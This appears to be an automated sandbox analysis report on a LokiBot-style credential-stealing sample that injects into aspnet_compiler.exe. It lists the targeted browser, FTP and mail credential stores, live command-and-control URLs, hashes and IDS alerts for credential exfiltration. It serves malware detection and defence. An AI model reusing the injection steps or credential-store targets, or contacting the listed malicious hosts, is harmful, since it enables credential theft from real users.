                Source: 1e#U0414.exe, 00000000.00000002.1750465955.00000000046BE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: %vL+o+HIpxflaQUFdyuioERPAot/W4EM5/xTa5gjxAAAAAGFXntLKgBbAfHB9ThGfs79njrfh4rlW/g/ELQPl2byrAAAAAGFXntLKgBbAvotC0B06uz5XPhM/Q42Rw/ZmRbohjLNQAAAAAGFXntLKgBbA55VlonSSerVyzUKNGzyf6daF/3B3nIS/AAAAAEz4eZtavaLAAAAAADd5O
                Source: aspnet_compiler.exe, 00000002.00000002.3003005750.0000000000E18000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040317B mov eax, dword ptr fs:[00000030h]2_2_0040317B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00402B7C GetProcessHeap,RtlAllocateHeap,2_2_00402B7C
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 0.2.1e#U0414.exe.58b0000.3.raw.unpack, BATMAN.csReference to suspicious API methods: WriteProcessMemory_API(processInformation.HasanHandle, num9 + 8, bytes, 4, ref bytesWritten)
                Source: 0.2.1e#U0414.exe.58b0000.3.raw.unpack, BATMAN.csReference to suspicious API methods: ReadProcessMemory_API(processInformation.HasanHandle, num9 + 8, ref buffer, 4, ref bytesWritten)
                Source: 0.2.1e#U0414.exe.58b0000.3.raw.unpack, BATMAN.csReference to suspicious API methods: VirtualAllocEx_API(processInformation.HasanHandle, 0, length, 12288, 64)
                Source: C:\Users\user\Desktop\1e#U0414.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000Jump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000Jump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 415000Jump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 41A000Jump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 4A0000Jump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: A5E008Jump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"Jump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeQueries volume information: C:\Users\user\Desktop\1e#U0414.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\1e#U0414.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 1e#U0414.exe PID: 6760, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6880, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000002.00000002.3003005750.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: PopPassword2_2_0040D069
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: SmtpPassword2_2_0040D069
                Source: Yara matchFile source: 0.2.1e#U0414.exe.446ab08.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.1e#U0414.exe.3450438.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1750465955.000000000446A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1750349195.0000000003419000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Native API
                1
                DLL Side-Loading
                1
                Access Token Manipulation
                1
                Masquerading
                2
                OS Credential Dumping
                11
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts311
                Process Injection
                1
                Disable or Modify Tools
                2
                Credentials in Registry
                1
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                31
                Virtualization/Sandbox Evasion
                Security Account Manager31
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares2
                Data from Local System
                3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                Access Token Manipulation
                NTDS1
                File and Directory Discovery
                Distributed Component Object ModelInput Capture113
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script311
                Process Injection
                LSA Secrets13
                System Information Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Deobfuscate/Decode Files or Information
                Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                1e#U0414.exe34%ReversingLabsByteCode-MSIL.Trojan.Generic
                1e#U0414.exe100%AviraTR/Dropper.MSIL.Gen
                1e#U0414.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://kbfvzoboss.bid/alien/fre.php100%Avira URL Cloudphishing
                http://www.ibsensoftware.com/0%Avira URL Cloudsafe
                http://alphastand.win/alien/fre.php100%Avira URL Cloudphishing
                https://dddotx.shop/Mine/PWS/fre.php100%Avira URL Cloudmalware
                http://alphastand.top/alien/fre.php100%Avira URL Cloudmalware
                http://dddotx.shop/Mine/PWS/fre.php100%Avira URL Cloudmalware
                http://alphastand.trade/alien/fre.php100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                dddotx.shop
                188.114.96.3
                truetrue
                  unknown
                  NameMaliciousAntivirus DetectionReputation
                  https://dddotx.shop/Mine/PWS/fre.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://kbfvzoboss.bid/alien/fre.phptrue
                  • Avira URL Cloud: phishing
                  unknown
                  http://alphastand.win/alien/fre.phptrue
                  • Avira URL Cloud: phishing
                  unknown
                  http://alphastand.trade/alien/fre.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://alphastand.top/alien/fre.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  http://dddotx.shop/Mine/PWS/fre.phptrue
                  • Avira URL Cloud: malware
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  http://www.ibsensoftware.com/aspnet_compiler.exe, aspnet_compiler.exe, 00000002.00000002.3002581608.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  188.114.96.3
                  dddotx.shopEuropean Union
                  13335CLOUDFLARENETUStrue
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1518306
                  Start date and time:2024-09-25 15:27:36 +02:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 4m 44s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:8
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:1e#U0414.exe
                  renamed because original name is a hash value
                  Original Sample Name: _(PO_46338032)_-- .exe
                  Detection:MAL
                  Classification:mal100.troj.spyw.evad.winEXE@5/3@1/1
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 67
                  • Number of non-executed functions: 5
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.
                  • VT rate limit hit for: 1e#U0414.exe
                  TimeTypeDescription
                  09:28:38API Interceptor128x Sleep call for process: aspnet_compiler.exe modified
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  188.114.96.3https://laurachenel-my.sharepoint.com/:f:/p/durae/EqNLWpSMEBRJoccjxMrYR9cBuepxDM4GGslgNeOpyvFENQ?e=1C1jRHGet hashmaliciousUnknownBrowse
                  • hdcy.emcl00.com/qRCfs/
                  PO23100072.exeGet hashmaliciousFormBookBrowse
                  • www.cc101.pro/ttiz/
                  RFQ urrgently.exeGet hashmaliciousFormBookBrowse
                  • www.1win-moldovia.fun/1g7m/
                  TNT AWB TRACKING DETAILS.exeGet hashmaliciousFormBookBrowse
                  • www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRtWAY1NzG57DnL+pjMXQcNu92teMaGp
                  Petronas quotation request.exeGet hashmaliciousFormBookBrowse
                  • www.chinaen.org/zi4g/
                  Shipping Documemt.vbsGet hashmaliciousLokibotBrowse
                  • werdotx.shop/Devil/PWS/fre.php
                  Quotes updates request.exeGet hashmaliciousFormBookBrowse
                  • www.1win-moldovia.fun/1g7m/
                  PO-001.exeGet hashmaliciousFormBookBrowse
                  • www.1win-moldovia.fun/kslt/
                  PO2024033194.exeGet hashmaliciousFormBookBrowse
                  • www.rtpngk.xyz/876i/
                  LOL and profile.exeGet hashmaliciousFormBookBrowse
                  • www.chinaen.org/zi4g/
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  dddotx.shop(PO403810)_VOLEX_doc.exeGet hashmaliciousLokibotBrowse
                  • 188.114.97.3
                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                  CLOUDFLARENETUSwm.vbsGet hashmaliciousPureLog Stealer, XWormBrowse
                  • 188.114.96.3
                  Teklifformu_Ekinoks LS 1087251 04-00000152.exeGet hashmaliciousSnake KeyloggerBrowse
                  • 188.114.96.3
                  http://mir-belting.comGet hashmaliciousUnknownBrowse
                  • 162.159.140.229
                  https://empshentel.com/share/sharefile/Get hashmaliciousHTMLPhisherBrowse
                  • 172.67.177.128
                  https://nvoice0077.s3.ap-southeast-2.amazonaws.com/Viewer.htmlGet hashmaliciousScreenConnect ToolBrowse
                  • 188.114.97.3
                  PO5118000306 pdf.exeGet hashmaliciousFormBookBrowse
                  • 188.114.97.3
                  ptgl503.exeGet hashmaliciousLummaCBrowse
                  • 172.67.206.221
                  https://odo1s.risongeye.com/oTUk/Get hashmaliciousHTMLPhisherBrowse
                  • 188.114.96.3
                  Suselx1.exeGet hashmaliciousLummaCBrowse
                  • 172.67.189.2
                  https://www.concursolutions.us.com/lstQ3Ewa4RAt2API1AnsoTxu4RAcQ3EpQ3E4RAfoTx4RAmsz01coTxmGet hashmaliciousUnknownBrowse
                  • 1.1.1.1
                  No context
                  No context
                  Process:C:\Users\user\Desktop\1e#U0414.exe
                  File Type:CSV text
                  Category:dropped
                  Size (bytes):226
                  Entropy (8bit):5.360398796477698
                  Encrypted:false
                  SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                  MD5:3A8957C6382192B71471BD14359D0B12
                  SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                  SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                  SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                  Malicious:true
                  Reputation:high, very likely benign file
                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  File Type:very short file (no magic)
                  Category:dropped
                  Size (bytes):1
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3:U:U
                  MD5:C4CA4238A0B923820DCC509A6F75849B
                  SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                  SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                  SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:1
                  Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):46
                  Entropy (8bit):0.0
                  Encrypted:false
                  SSDEEP:3::
                  MD5:D898504A722BFF1524134C6AB6A5EAA5
                  SHA1:E0FDC90C2CA2A0219C99D2758E68C18875A3E11E
                  SHA-256:878F32F76B159494F5A39F9321616C6068CDB82E88DF89BCC739BBC1EA78E1F9
                  SHA-512:26A4398BFFB0C0AEF9A6EC53CD3367A2D0ABF2F70097F711BBBF1E9E32FD9F1A72121691BB6A39EEB55D596EDD527934E541B4DEFB3B1426B1D1A6429804DC61
                  Malicious:false
                  Reputation:high, very likely benign file
                  Preview:..............................................
                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                  Entropy (8bit):7.473390936917942
                  TrID:
                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  • Win32 Executable (generic) a (10002005/4) 49.78%
                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                  • Generic Win/DOS Executable (2004/3) 0.01%
                  • DOS Executable Generic (2002/1) 0.01%
                  File name:1e#U0414.exe
                  File size:168'448 bytes
                  MD5:ed9fe2c20a68172921c064d0d9886b7b
                  SHA1:d892be8018cbc88b8cdd0db2338f643448630757
                  SHA256:bfcc16e302514e80fdc77675291f1bdb32796e7b77274f7596049938d0652347
                  SHA512:8fdaaedc9585e72ebfdb8ba85e79f52614d9b3626327ac882cc4a2f108ed71335e013b173a628cd83135f8806644f9af4ac1f7026a4a0ae71f12057534269160
                  SSDEEP:3072:OgX3OY/NPH8Aq+XdOeuohMvEuf555vyWd+9MtGGE0vWGNF7owCCx7/WgafCzg:WOLOAhLuhvyi6GTb8wCC5/Wgb
                  TLSH:4FF3ADA87BFA9E53D14A6732159205051738ED27FA4BFF4F4689307A1E723E61C0E683
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../..f..............0..z..........*.... ........@.. ....................................`................................
                  Icon Hash:010d4c4948182c0e
                  Entrypoint:0x42992a
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66F2892F [Tue Sep 24 09:41:03 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:4
                  OS Version Minor:0
                  File Version Major:4
                  File Version Minor:0
                  Subsystem Version Major:4
                  Subsystem Version Minor:0
                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                  Instruction
                  jmp dword ptr [00402000h]
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  add byte ptr [eax], al
                  NameVirtual AddressVirtual Size Is in Section
                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IMPORT0x298d00x57.text
                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000x1264.rsrc
                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2a0000xc.reloc
                  IMAGE_DIRECTORY_ENTRY_DEBUG0x214540x1c.text
                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                  .text0x20000x279300x27a00d447f9c4e8ac8396ad93736d4b377033False0.8035846313091483data7.531903789782718IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  .reloc0x2a0000xc0x2004fff437a5d708043657d9e04318c81b4False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                  .rsrc0x2c0000x12640x14009b10bfd37a73372606617dc2c50b8350False0.301953125data4.131782053141191IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                  NameRVASizeTypeLanguageCountryZLIB Complexity
                  RT_ICON0x2c1300xc28Device independent bitmap graphic, 23 x 64 x 32, image size 2944, resolution 11811 x 11811 px/m0.2577120822622108
                  RT_GROUP_ICON0x2cd580x14data1.1
                  RT_VERSION0x2cd6c0x30cdata0.4256410256410256
                  RT_MANIFEST0x2d0780x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                  DLLImport
                  mscoree.dll_CorExeMain
                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                  2024-09-25T15:28:34.491221+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.456006TCP
                  2024-09-25T15:28:36.808752+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449730188.114.96.380TCP
                  2024-09-25T15:28:36.808752+02002025381ET MALWARE LokiBot Checkin1192.168.2.449730188.114.96.380TCP
                  2024-09-25T15:28:36.808752+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449730188.114.96.380TCP
                  2024-09-25T15:28:37.472266+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.449730188.114.96.380TCP
                  2024-09-25T15:28:37.787248+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449731188.114.96.380TCP
                  2024-09-25T15:28:37.787248+02002025381ET MALWARE LokiBot Checkin1192.168.2.449731188.114.96.380TCP
                  2024-09-25T15:28:37.787248+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449731188.114.96.380TCP
                  2024-09-25T15:28:38.475893+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.449731188.114.96.380TCP
                  2024-09-25T15:28:38.549981+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449732188.114.96.380TCP
                  2024-09-25T15:28:38.549981+02002025381ET MALWARE LokiBot Checkin1192.168.2.449732188.114.96.380TCP
                  2024-09-25T15:28:38.549981+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449732188.114.96.380TCP
                  2024-09-25T15:28:39.241108+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449732188.114.96.380TCP
                  2024-09-25T15:28:39.241108+02002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.449732188.114.96.380TCP
                  2024-09-25T15:28:39.246004+02002025483ET MALWARE LokiBot Fake 404 Response1188.114.96.380192.168.2.449732TCP
                  2024-09-25T15:28:39.422340+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.449733188.114.96.380TCP
                  2024-09-25T15:28:39.422340+02002025381ET MALWARE LokiBot Checkin1192.168.2.449733188.114.96.380TCP
                  2024-09-25T15:28:39.422340+02002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.449733188.114.96.380TCP
                  2024-09-25T15:28:40.175614+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.449733188.114.96.380TCP
